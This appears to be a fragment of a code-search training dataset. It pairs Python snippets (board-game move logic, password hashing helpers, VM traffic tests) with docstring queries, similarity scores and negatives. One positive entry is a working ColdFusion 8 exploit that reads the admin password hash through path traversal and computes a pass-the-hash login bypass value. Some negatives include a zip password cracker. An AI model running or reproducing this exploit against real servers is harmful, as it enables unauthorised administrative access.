if move.pieceMoved[1] == \"p\" and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ()\r\n\r\n # castle rights\r\n self.castleRightsLog.pop()\r\n self.cr_castle_r = self.castleRightsLog[-1]\r\n\r\n # castle moves\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 1]\r\n self.board[move.er][move.ec - 1] = '--'\r\n else:\r\n self.board[move.er][move.ec - 2] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'", "def make_move(self, move: Any) -> 'StonehengeState':\n if type(move) == str:\n new_state = StonehengeState(not self.p1_turn, self.side_length)\n # copy the board information from current state\n # make copy of current state information\n hori_lst_copy = []\n for lst in self.hori_lst:\n temp = []\n for item in lst:\n temp.append(item)\n hori_lst_copy.append(temp)\n left_lst_copy = []\n for lst in self.left_lst:\n temp = []\n for item in lst:\n temp.append(item)\n left_lst_copy.append(temp)\n right_lst_copy = []\n for lst in self.right_lst:\n temp = []\n for item in lst:\n temp.append(item)\n right_lst_copy.append(temp)\n\n hori_result_copy = []\n for item in self.hori_result:\n hori_result_copy.append(item)\n left_result_copy = []\n for item in self.left_result:\n left_result_copy.append(item)\n right_result_copy = []\n for item in self.right_result:\n right_result_copy.append(item)\n\n new_state.hori_lst = hori_lst_copy\n new_state.hori_result = hori_result_copy\n new_state.left_lst = left_lst_copy\n new_state.left_result = left_result_copy\n new_state.right_lst = right_lst_copy\n new_state.right_result = right_result_copy\n # update the new state with str move\n # parallel nested list data structure\n lst = [new_state.hori_lst, new_state.left_lst, new_state.right_lst]\n result = [new_state.hori_result, new_state.left_result, new_state.right_result]\n # update the cell\n for i in range(len(lst)):\n for j in range(len(lst[i])):\n for k in range(len(lst[i][j])):\n if lst[i][j][k] == move:\n # should use the player name of last state, so opposite names\n if new_state.p1_turn:\n lst[i][j][k] = \"2\"\n else:\n lst[i][j][k] = \"1\"\n # update ley-line marks\n # the ley-line may belong to a player after this move\n p1_taken = 0\n p2_taken = 0\n if result[i][j] != \"@\":\n continue\n for item in lst[i][j]:\n if item == \"1\":\n p1_taken += 1\n if item == \"2\":\n p2_taken += 1\n if float(p1_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"1\"\n if float(p2_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"2\"\n ###### CHECK FOR SHALLOW COPY PROBLEM, IF ATTRIBUTE IS UPDATE IN NEW STATE\n return new_state", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def make_move(move, player, board):\n board[move] = player\n for d in DIRECTIONS:\n Othello.make_flips(move, player, board, d)\n return board", "def result(self, board_state, move):\n # Create a copy of the current board state\n output_state = BoardState(other_state=board_state)\n # Swap pieces\n output_state.move_piece(move)\n # Eliminate pieces\n output_state.eliminate_piece()\n return output_state" ]
[ "0.7041228", "0.6890704", "0.6870524", "0.6765509", "0.6765455", "0.67173713", "0.6701276", "0.66965497", "0.66819054", "0.6667514", "0.6663559", "0.66578156", "0.66204715", "0.657253", "0.65490776", "0.6526394", "0.6526335", "0.6520004", "0.6495556", "0.6494918", "0.6452767", "0.6435724", "0.64350605", "0.64282227", "0.64204675", "0.64192647", "0.6402228", "0.6399187", "0.63986206", "0.637706" ]
0.7599279
0
Attempts to exploit a ColdFusion file disclosure vulnerability to retrieve a hashed admin password. If found, this script will produce a hash to be used to bypass admin login by computing the value of the admin hash and a ColdFusion salt input parameter.
def retrieve_hash(host, salt): password_pattern = re.compile(r'\npassword=(.+)\r') url = 'http://%s/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%%00en' % host try: response = requests.post(url) password_hash = re.search(password_pattern, response.text) if len(password_hash.groups()) > 0: password_hash = str(password_hash.groups()[0]) output_hash = generate_hash(password_hash, str(salt)) click.echo('ColdFusion 8 admin password pass-the-hash form bypass.') click.echo('Created by: [email protected]') click.echo('NOTE** Use Tamper Data or similar to set form field "cfadminPassword" to this hash value. Enjoy!') click.echo('------------------') click.echo('Result: %s' % output_hash) click.echo('------------------') else: click.secho('Unable to retrieve either password or salt value.', fg='red', bold=True) except Exception as e: click.secho('Error: %s.' % e, fg='red', bold=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pre_hash(masterpw, password, args):\n salt_hasher = hmac.new(masterpw, digestmod=DIGEST)\n\n if args.salt_url is not None:\n print(\"[INFO] Using resource at URL as salt ...\")\n with urlopen(args.salt_url) as f:\n while True:\n data = f.read(128)\n if len(data) != 0:\n salt_hasher.update(data)\n else:\n break\n\n key_len = int(math.ceil((math.log(len(default_charlist), 2) * args.len_chars) / 8))\n key = pbkdf2(password, salt_hasher.digest(),\n iter_count=args.iterations, dk_len=key_len,\n digest=DIGEST)\n return base_charlist_encode(key, default_charlist)", "def calculate_short_password_attribute(password, shared_secret, requ_auth):\n password = bytearray(password)\n shared_secret = bytearray(shared_secret)\n requ_auth = bytearray(requ_auth)\n\n\n b = bytearray(hashlib.md5(shared_secret + requ_auth).digest())\n c = xor(b, pad_with_zeros(password,16))\n return c", "def old_password (string):\n\t\n\treturn hexdigest_mySQL41prior (string)", "def _encryptDBPass():\n #run encrypt tool on user given password\n controller.CONF[\"ENCRYPTED_DB_PASS\"] = utils.encryptEngineDBPass(password=controller.CONF[\"DB_PASS\"],\n maskList=masked_value_set)", "def _migrate_admin_password():\n if os.path.exists(STORED_PASSWD):\n log('Migrating on-disk stored passwords to peer storage')\n with open(STORED_PASSWD) as fd:\n peer_store(\"admin_passwd\", fd.readline().strip('\\n'))\n\n os.unlink(STORED_PASSWD)", "def main():\n credentials = ('natas6', 'aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1')\n secret = get_secret(HOST + HOST_APPEND, credentials)[1:-2]\n if secret is not None:\n params = {'secret' : secret, 'submit': 'placeholder'}\n print('Natas7 credentials are:\\n' + KEYWORD + ':' + exploit(HOST, credentials, params))", "def checkPassword(self, password):\n # get the hash\n pswFile = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"adminPass.psw\")\n if os.path.isfile(pswFile):\n f = open(pswFile, \"r\")\n if f.mode == \"r\":\n hashedPass = f.read()\n else:\n return None\n f.close()\n ## use the default password hash if there is no password file\n else:\n hashedPass=\"7110eda4d09e062aa5e4a390b0a572ac0d2c0220\"\n\n passToCheck = (hashlib.sha1(str(password).encode('utf-8')).hexdigest())\n\n if passToCheck == hashedPass:\n return True\n else:\n return False", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def Cracker():\n attempts = 0\n flag = 0\n with open(dictionary_attack, 'r') as attack:\n print(\"Cracking password...one sec\")\n print(\"------------------------------\")\n for line in attack:\n \"\"\"\n Using a try...exception to keep attempting\n the different passwords from the wordlist\n \"\"\"\n try:\n # from the wordlist there is newline\n # they need to be stripped\n # encode passwd from str to bytes\n passwd = line.strip('\\n')\n zFile.extractall(pwd=str.encode(passwd))\n except Exception:\n attempts += 1\n pass\n else:\n print(\"Success! Password is %s\" % (passwd))\n flag = 1\n break\n print(\"Attempted %d passwords from %s wordlist\" %\n (attempts, dictionary_attack))\n if flag == 0:\n print(\"Password Cracking Failed! It is too strong for me :(\")", "def get_correct_pw_md5():\n f = open(PASSWORD_FILE, 'r')\n pw_md5 = f.read().strip()\n f.close()\n return pw_md5", "def hash_password(self, password):\n cmd = [\n \"snap\",\n \"run\",\n \"{}.hash-password\".format(self.synapse_snap),\n \"-c\",\n self.synapse_config,\n \"-p\",\n password,\n ]\n result = check_output(cmd)\n str_result = result.decode(\"utf-8\")\n return str_result.rstrip()", "def getpass(data, ident, hostport, dbname):\n m = hashlib.sha256()\n m.update(ident.encode())\n\n # mix in the seed (the last line) for that database, if one exists\n hostport = hostport.lower()\n dbname = dbname.lower()\n hostPortDbname = '{0}/{1}:{2}'.format(OPT_MANAGER_RESOURCES_PGAAS, hostport, dbname)\n try:\n lastLine = ''\n with open(hostPortDbname, \"r\") as fp:\n for line in fp:\n lastLine = line\n m.update(lastLine.encode())\n except IOError:\n pass\n\n m.update(base64.b64decode(data['data']))\n return m.hexdigest()", "def getpassword(value):\n hashed = \"%s%s\" % (value, SECRET_KEY)\n hasher = hashlib.md5()\n hasher.update(hashed)\n return hasher.hexdigest()[-8:]", "def validate_admin (admin_secret):\n\n try:\n admin_secret = admin_secret.encode()\n hashed = app.config['ADMIN_SECRET'].encode()\n return bcrypt.checkpw(admin_secret, hashed)\n\n except Exception as e:\n return False", "def get_password():\n\n pwd = getpass(\"Enter your password below. It is used to protect your credentials.\\n\"\n \"The password must have a minimum length of 8 characters \"\n \"and can only contain alphanumeric characters and symbols.\\n\"\n \"Enter password (will be hidden): \")\n\n tries = 0 # Limit number of invalid attempts\n while True:\n if len(pwd) >= 8 and pwd.isascii() and pwd.isprintable() and ' ' not in pwd:\n if getpass(\"Confirm password: \") == pwd:\n return pwd\n else:\n print(\"Password mismatch!\")\n else:\n print(\"Invalid characters in password or too short!\")\n\n if tries == 3: return None\n pwd = getpass(\"\\nRe-enter password: \")\n tries += 1", "def get_auth_password():\n password = AUTH_PASSWORD_SCRIPT.get()\n if password:\n return password\n return DEFAULT_AUTH_PASSWORD.get()", "def redis_pwd():\n with open(\"/etc/redis/redis.conf\") as fd:\n secret_cfg = fd.read().splitlines()\n\n for line in secret_cfg:\n line = line.strip()\n if line.startswith(\"requirepass\"):\n return line.split(\" \")[1].strip()\n return ''", "def get_user_password(text):\n return getpass.getpass(text)", "def password(self, value):\n self.password_hashed = func.crypt(value, func.gen_salt('bf'))", "def _pepper_hash(pepper, password, salt):\n return '{:0>8}{:s}{:s}'.format(pepper, password, salt)", "def testPassword(cryptPass, dictionaryFile):\n #salt = cryptPass[0:2]\n salt = crypt.mksalt(crypt.METHOD_SHA512) # Updated for SHA512 encrypted passwords\n dictFile = open(dictionaryFile, 'r')\n for word in dictFile.readlines():\n word = word.strip('\\n')\n cryptWord = crypt.crypt(word, salt)\n \n if cryptWord == cryptPass:\n print('[+] Found Password: ' + word + '\\n')\n return\n print('[-] Password Not Found.\\n')\n return", "def admin_password(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"admin_password\")", "def get_hashed_value(password):\n salt = 'saifulBoss'\n password = salt + password\n return md5(password.encode('utf-8')).hexdigest()", "def get_hashed_value(password):\n salt = 'saifulBoss'\n password = salt + password\n return md5(password.encode('utf-8')).hexdigest()", "def verify_password(stored_password, provided_password):\n #print(provided_password)\n salt = stored_password[:64]\n stored_password = stored_password[64:]\n pwdhash = hashlib.pbkdf2_hmac('sha512', \n provided_password.encode('utf-8'), \n salt.encode('ascii'), \n 100000)\n pwdhash = binascii.hexlify(pwdhash).decode('ascii')\n #print(pwdhash)\n return pwdhash == stored_password", "def crackHash(self, startHash):\n for col in range(self.columns, -1, -1):\n hashV = self._getFinalHash(startHash, col)\n pwdList = self._find(hashV)\n for pwd in pwdList:\n resPwd = self._findHashInChain(pwd, startHash)\n if resPwd != None:\n return resPwd\n return ''", "def scan_admin_url():\r\n target_admin_url=provided_url+\"/administrator/index.php\"\r\n if verbose_flag: print \"\\t[.] Trying to access admin login page...\", #+ target_admin_url\r\n try:\r\n response = urllib2.urlopen(target_admin_url)\r\n except HTTPError, e:\r\n admin_flag=0\r\n #print \"admin flag=\"+str(admin_flag)\r\n if verbose_flag: print \"Failed\"\r\n return admin_flag\r\n else:\r\n admin_flag=1\r\n #print \"admin flag=\"+str(admin_flag)\r\n if verbose_flag: print \"Success\"\r\n return admin_flag", "def get_password_hash(password):\n\n return pwd_context.hash(password)", "def SecondPart():\n return passwordChecker(data)" ]
[ "0.56448627", "0.55366296", "0.54568374", "0.54494023", "0.53573483", "0.533294", "0.5329196", "0.5288839", "0.52837366", "0.5233808", "0.52312523", "0.5218411", "0.51976466", "0.5186236", "0.5183251", "0.51653415", "0.5149853", "0.51409924", "0.5114079", "0.51067483", "0.5090526", "0.50880903", "0.5086922", "0.5082064", "0.5082064", "0.5081676", "0.5046229", "0.50236994", "0.5004978", "0.50004697" ]
0.6947036
0
This method starts traffic between VMs using pktgen
def start_traffic_pktgen_between_vm( sr_vm_fix, dst_vm_fix, dest_min_port=10000, dest_max_port=10000): start_traffic_pktgen( sr_vm_fix, src_min_ip=sr_vm_fix.vm_ip, src_max_ip=sr_vm_fix.vm_ip, dest_ip=dst_vm_fix.vm_ip, dest_min_port=dest_min_port, dest_max_port=dest_max_port)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def start_traffic_pktgen(\n vm_fix,\n src_min_ip='',\n src_max_ip='',\n dest_ip='',\n dest_min_port='',\n dest_max_port=''):\n vm_fix.logger.info(\"Sending traffic...\")\n try:\n cmd = '~/pktgen_new.sh %s %s %s %s %s' % (src_min_ip,\n src_max_ip,\n dest_ip,\n dest_min_port,\n dest_max_port)\n vm_fix.run_cmd_on_vm(cmds=[cmd], as_sudo=True)\n except Exception as e:\n vm_fix.logger.exception(\"Got exception at start_traffic as %s\" % (e))", "def start_net(self):\n super(FaucetTopoTestBase, self).start_net()\n # Create a dictionary of host information that might be used in a test later on.\n # This makes it easier to retrieve certain information and consolidates it into one\n # location.\n self.host_information = {}\n for host_id, host_name in self.topo.hosts_by_id.items():\n host_obj = self.net.get(host_name)\n vlan = self.host_vlans[host_id]\n ip_interface = ipaddress.ip_interface(self.host_ip_address(host_id, vlan))\n self.set_host_ip(host_obj, ip_interface)\n self.host_information[host_id] = {\n 'host': host_obj,\n 'ip': ip_interface,\n 'mac': host_obj.MAC(),\n 'vlan': vlan,\n 'bond': None,\n 'ports': {}\n }\n # Add information of hosts chosen dpid, port map values\n # TODO: This redoes logic from get_config()\n for i, dpid in enumerate(self.dpids):\n index = 1\n for host_id, links in self.host_links.items():\n if i in links:\n n_links = links.count(i)\n for _ in range(n_links):\n port = self.port_maps[dpid]['port_%d' % index]\n self.host_information[host_id]['ports'].setdefault(dpid, [])\n self.host_information[host_id]['ports'][dpid].append(port)\n index += 1\n # Store faucet vip interfaces\n self.faucet_vips = {}\n for vlan in range(self.n_vlans):\n self.faucet_vips[vlan] = ipaddress.ip_interface(self.faucet_vip(vlan))\n # Setup the linux bonds for LACP connected hosts\n self.setup_lacp_bonds()\n # Add host routes to hosts for inter vlan routing\n self.setup_intervlan_host_routes()", "def _starting(self, sender, **kwargs):\n _log.info('Starting: {}'.format(self.__name__))\n self.vip.heartbeat.start()\n # _log.debug(self.vip.ping('', \"PING ROUTER?\").get(timeout=3))\n #\n q = query.Query(self.core)\n # TODO: Use all addresses for fallback, #114\n self._external_addresses = q.query(b'addresses').get(timeout=30)\n assert self._external_addresses\n self._serverkey = q.query(b'serverkey').get(timeout=30)\n\n _log.debug(\"external addresses are: {}\".format(\n self._external_addresses\n ))\n\n # self._local_address = q.query('local_address').get(timeout=30)\n # _log.debug('Local address is? {}'.format(self._local_address))\n _log.info('Registering jsonrpc and /.* routes with {}'.format(\n MASTER_WEB\n ))\n\n self.vip.rpc.call(MASTER_WEB, 'register_agent_route',\n r'^/jsonrpc.*',\n self.core.identity,\n 'jsonrpc').get(timeout=10)\n\n self.vip.rpc.call(MASTER_WEB, 'register_path_route', VOLTTRON_CENTRAL,\n r'^/.*', self._webroot).get(timeout=20)\n\n self.webaddress = self.vip.rpc.call(\n MASTER_WEB, 'get_bind_web_address').get(timeout=30)\n\n # Remove so that dynamic agents don't inherit the identity.\n os.environ.pop('AGENT_VIP_IDENTITY')", "def launch_vrouter_instance(self):\n # Add code to start vrouter\n if (self.vr_args['vtest_only']):\n self.logger.info(\"VTEST_ONLY_RETURN \" +\n str(self.vr_args['vtest_only']))\n return\n cpid = os.fork()\n if cpid == 0:\n vrouter_cmd_args = [\"taskset\", self.vr_args['taskset'],\n self.vr_args['vrouter_path'], \"--no-daemon\",\n \"--no-huge\", \"--vr_packet_sz\", \"2048\"]\n if self.vr_args['dpdk_args']:\n for dpdk_arg in self.vr_args['dpdk_args'].split(' '):\n vrouter_cmd_args.append(dpdk_arg)\n vrouter_cmd_args.extend([\"--vr_socket_dir\",\n self.vr_args['socket_dir']])\n os.execvp(\"taskset\", vrouter_cmd_args)\n else:\n self.logger.info(\n \"Running cmd - taskset %s %s --no-daemon --no-huge \"\n \"--vr_packet_sz 2048 --vr_socket_dir %s\" %\n (self.vr_args['taskset'],\n self.vr_args['vrouter_path'],\n self.vr_args['socket_dir']))\n self.logger.info(\"pid = \" + str(cpid))\n self.pid = cpid\n count = 0\n ret = 0\n while (count < 10):\n cmd = \"lsof \" + self.vr_args['socket_dir'] +\\\n \"/dpdk_netlink | wc -l\"\n self.logger.info(\"Running cmd - {}\".format(cmd))\n try:\n ret = subprocess.check_output(cmd, shell=True)\n # check if the netlink is up using the ret value\n if (ret == \"2\\n\"):\n break\n else:\n time.sleep(1)\n count += 1\n except Exception as e:\n self.logger.error(e)\n time.sleep(1)\n count += 1\n if (ret != \"2\\n\"):\n self.logger.error(\"Failed to bringup vrouter\")\n return -1\n else:\n return 0", "def start_traffic(self):\n raise NotImplementedError", "def dvs_attached_ports(self):\n # Set up environment for the test\n self.show_step(1)\n\n self.env.revert_snapshot('dvs_vcenter_systest_setup')\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n os_ip = self.fuel_web.get_public_vip(cluster_id)\n os_conn = os_actions.OpenStackActions(\n os_ip, SERVTEST_USERNAME,\n SERVTEST_PASSWORD,\n SERVTEST_TENANT)\n\n tenant = os_conn.get_tenant(SERVTEST_TENANT)\n\n # Create net_1 and attach it to the default router\n self.show_step(2)\n\n net1 = os_conn.create_network(network_name=self.net_data[0].keys()[0],\n tenant_id=tenant.id)['network']\n subnet1 = os_conn.create_subnet(\n subnet_name=net1['name'],\n network_id=net1['id'],\n cidr=self.net_data[0][self.net_data[0].keys()[0]],\n ip_version=4)\n\n # Check that network is created\n assert_true(os_conn.get_network(net1['name'])['id'] == net1['id'])\n\n # Add net_1 to default router\n default_router = os_conn.neutron.list_routers()['routers'][0]\n os_conn.add_router_interface(router_id=default_router['id'],\n subnet_id=subnet1['id'])\n\n # Create security group SG1\n self.show_step(3)\n\n sg1 = os_conn.nova.security_groups.create('SG1', 'descr')\n _sg_rules = os_conn.neutron.list_security_group_rules()\n sg1_rules = [sg_rule for sg_rule in _sg_rules['security_group_rules']\n if sg_rule['security_group_id'] == sg1.id]\n for rule in sg1_rules:\n os_conn.neutron.delete_security_group_rule(rule['id'])\n for rule in [self.icmp, self.tcp]:\n rule[\"security_group_rule\"][\"security_group_id\"] = sg1.id\n rule[\"security_group_rule\"][\"remote_group_id\"] = sg1.id\n\n rule[\"security_group_rule\"][\"direction\"] = \"ingress\"\n os_conn.neutron.create_security_group_rule(rule)\n\n rule[\"security_group_rule\"][\"direction\"] = \"egress\"\n os_conn.neutron.create_security_group_rule(rule)\n\n default_net = os_conn.nova.networks.find(label=self.inter_net_name)\n\n # Permit all TCP and ICMP in security group default\n os_conn.goodbye_security()\n\n _groups = os_conn.neutron.list_security_groups()['security_groups']\n default_sg = [sg for sg in _groups\n if sg['tenant_id'] == tenant.id and\n sg['name'] == 'default'][0]\n\n # Launch instances with SG1 in net_1\n self.show_step(4)\n\n instances_1 = openstack.create_instances(\n os_conn=os_conn,\n nics=[{'net-id': net1['id']}],\n security_groups=[sg1.name])\n\n _, access_point_ip_1 = openstack.create_access_point(\n os_conn=os_conn,\n nics=[{'net-id': net1['id']}],\n security_groups=[default_sg['name'], sg1.name])\n\n # Launch instances with Default SG in net_1\n self.show_step(5)\n\n instances_2 = openstack.create_instances(\n os_conn=os_conn,\n nics=[{'net-id': net1['id']}],\n security_groups=[default_sg['name']])\n\n openstack.verify_instance_state(os_conn)\n\n # Verify that icmp/ssh is enabled in SG1\n self.show_step(6)\n\n ips_1 = [os_conn.get_nova_instance_ip(i, net_name=net1['name'])\n for i in instances_1]\n\n openstack.ping_each_other(ips=ips_1,\n timeout=60 * 5,\n access_point_ip=access_point_ip_1)\n\n # Verify that icmp/ssh isn't allowed between SG1 and Default SG\n self.show_step(7)\n\n ips_2 = [os_conn.get_nova_instance_ip(i, net_name=net1['name'])\n for i in instances_2]\n ip_pairs = {ip: ips_2 for ip in ips_1}\n openstack.check_connection_through_host(remote=access_point_ip_1,\n timeout=60,\n ip_pair=ip_pairs,\n result_of_command=1)\n\n # Detach ports of all instances from net_1\n self.show_step(8)\n # Attach ports of all instances to default internal net\n self.show_step(9)\n\n for instance in instances_1:\n ip = os_conn.get_nova_instance_ip(instance, net_name=net1['name'])\n port = [p for p in os_conn.neutron.list_ports()['ports']\n if p['fixed_ips'][0]['ip_address'] == ip].pop()\n instance.interface_detach(port['id'])\n instance.interface_attach(None, default_net.id, None)\n instance.reboot() # instead of network restart\n\n # Check that all instances are in Default SG\n self.show_step(10)\n\n ips_1 = []\n instances_1 = [instance for instance in os_conn.nova.servers.list()\n if instance.id in [inst.id for inst in instances_1]]\n for instance in instances_1:\n assert_true(instance.security_groups.pop()['name'] == 'default')\n ips_1.append(os_conn.get_nova_instance_ip(\n srv=instance, net_name=self.inter_net_name))\n\n # Verify that icmp/ssh is enabled between instances (in Default SG)\n self.show_step(11)\n\n _, access_point_ip_2 = openstack.create_access_point(\n os_conn=os_conn,\n nics=[{'net-id': default_net.id}],\n security_groups=[default_sg['name']])\n\n openstack.ping_each_other(ips=ips_1 + ips_2,\n timeout=60,\n access_point_ip=access_point_ip_2)\n\n # Change for some instances Default SG to SG1\n self.show_step(12)\n\n for instance in instances_1:\n instance.remove_security_group('default')\n instance.add_security_group(sg1.name)\n\n # Verify that icmp/ssh is enabled in SG1\n self.show_step(13)\n\n openstack.ping_each_other(ips=ips_1,\n timeout=60,\n access_point_ip=access_point_ip_1)\n\n # Verify that icmp/ssh isn't allowed between SG1 and Default SG\n self.show_step(14)\n\n ip_pairs = {ip: ips_2 for ip in ips_1}\n openstack.check_connection_through_host(remote=access_point_ip_1,\n timeout=60,\n ip_pair=ip_pairs,\n result_of_command=1)", "def start_pcap(host, pcap_file_name, interface, pcap_args='',\n func_ip=None, tool_path=None):\n with LydianClient(_get_host_ip(host, func_ip)) as client:\n client.pcap.start_pcap(pcap_file_name, interface, pcap_args, tool_path)", "def Bg_ping_start(host, options):\r\n BgPing.start_traffic(host, options)", "def pkt_gen(self):\n for i in range(self.num_pkts):\n # create the test packets\n pkt = Ether()/IP()/TCP()/'hello there pretty world!!!'\n rank = random.sample(range(0, 100), 1)[0]\n pkt_id = i\n tuser = Tuser(len(pkt), 0b00000001, 0b00000100, rank, pkt_id)\n print ('@ {:.2f} - Send: {} || {}'.format(self.env.now, pkt.summary(), tuser))\n # write the pkt and metadata into storage\n self.pkt_in_pipe.put((pkt, tuser))\n\n # wait for 10 cycles\n #for j in range(PREAMBLE + len(pkt) + IFG):\n yield self.wait_line_clks(self.PREAMBLE + len(pkt) + self.IFG)", "def set_up_all(self):\n # Based on h/w type, choose how many ports to use\n self.dut_ports = self.dut.get_ports(self.nic)\n # Verify that enough ports are available\n self.verify(len(self.dut_ports) >= 1, \"Insufficient ports\")\n\n localPort = self.tester.get_local_port(self.dut_ports[0])\n self.tester_itf = self.tester.get_interface(localPort)\n self.tester_mac = self.tester.get_mac(localPort)\n self.pf_interface = self.dut.ports_info[self.dut_ports[0]]['intf']\n self.pf_mac = self.dut.get_mac_address(0)\n self.pf_pci = self.dut.ports_info[self.dut_ports[0]]['pci']\n self.pmdout = PmdOutput(self.dut)\n self.cores = \"1S/2C/1T\"\n self.pkt1 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.2')/SCTP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.pkt2 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.2')/UDP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt3 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.3')/TCP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt4 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.2')/('X'*48)\" % self.pf_mac\n self.pkt5 = \"Ether(dst='%s')/IPv6(src='2001::1',dst='2001::2',nh=132)/SCTP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.pkt6 = \"Ether(dst='%s')/IPv6(src='2001::1',dst='2001::2')/UDP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt7 = \"Ether(dst='%s')/IPv6(src='2001::2',dst='2001::3')/TCP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt8 = \"Ether(dst='%s')/IPv6(src='2001::2',dst='2001::3')/('X'*48)\" % self.pf_mac\n self.prio_pkt1 = \"Ether(dst='%s')/Dot1Q(prio=1)/IP(src='10.0.0.1',dst='192.168.0.2')/TCP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.prio_pkt2 = \"Ether(dst='%s')/Dot1Q(prio=2)/IP(src='10.0.0.1',dst='192.168.0.2')/TCP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.prio_pkt3 = \"Ether(dst='%s')/Dot1Q(prio=3)/IP(src='10.0.0.1',dst='192.168.0.2')/TCP(dport=80, sport=80)/('X'*48)\" % self.pf_mac", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index, enable_ip6=True\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10,\n is_ip6=1,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10000,\n is_ip6=1,\n )\n self.logger.debug(self.vapi.ppcli(\"show ip6-full-reassembly details\"))\n self.logger.debug(self.vapi.ppcli(\"show buffers\"))", "def start_network(self):\n try:\n self.topo.build_topo()\n except:\n error('Cannot build the topology.')\n try:\n self.net = IPNet(topo=self.topo, use_v4=False, use_v6=True)\n self.net.start()\n except:\n self.stop_network()\n error('Cannot start the network.')", "def CASE1( self, main ):\n\n from tests.USECASE.SegmentRouting.SRRouting.dependencies.SRRoutingTest import SRRoutingTest\n\n SRRoutingTest.runTest( main,\n test_idx=1,\n onosNodes=3,\n dhcp=1,\n routers=1,\n ipv4=1,\n ipv6=0,\n countFlowsGroups=False,\n linkFailure=False,\n description=\"Ping between all ipv4 hosts in the topology\" )", "def do_startstcv(self, args):\n if not self._assert_login():\n return\n\n vm_image = None\n ttl_minutes = 60\n socket = False\n desc = None\n instances = 2\n host = None\n cores = 1\n memory = None\n vlan = None\n ntp_server = None\n license_server = None\n share = True\n static_ip = None\n netmask = None\n gateway = None\n external = False\n\n if args:\n args = args.split()\n missing_arg = 'missing value after'\n while args:\n arg = args.pop(0)\n if arg in ('-i', '--image'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n vm_image = args.pop(0)\n elif arg in ('-t', '--ttl'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n ttl_minutes = 